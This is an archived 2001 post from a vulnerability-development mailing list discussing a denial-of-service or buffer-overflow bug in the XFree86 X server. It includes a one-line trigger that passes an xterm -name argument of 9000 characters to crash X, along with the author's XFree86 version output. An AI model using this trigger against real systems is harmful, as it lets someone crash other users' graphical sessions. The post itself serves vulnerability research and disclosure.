Vulnerability Development mailing list archives

Re: XFree86 DOS / Buffer overflow local and remote.

From: KF <dotslash () snosoft com>
Date: Sun, 23 Sep 2001 06:59:39 -0400

The issue is with XFree86 not with mozilla or netscape HTML simply provided an easy way of
injecting the payload...

xterm -display localhost:0 -name `perl -e 'print "A" x 9000'` should also do it... again this is not a hole in netscape or xterm just the attack method used to cause X to crash.

Here is my Xwindows information.
[root@osx root]# X -version

XFree86 Version 4.0.3 / X Window System
Release Date: 16 March 2001
      If the server is older than 6-12 months, or if your card is
      newer than the above date, look for a newer version before
      reporting problems.  (See http://www.XFree86.Org/FAQ)
Operating System: Linux 2.4.4-pre8 ppc [ELF]
Module Loader present

-KF

Simos Xenitellis wrote:

Hi,
I do not know if I got it correctly but here is goes.
Do you load the file in Netscape/Mozilla with something like
        file:///tmp/file.html
and then close the application from the x box?

It did not crash on netscape 4.77, not mozilla 0.9.4.

simos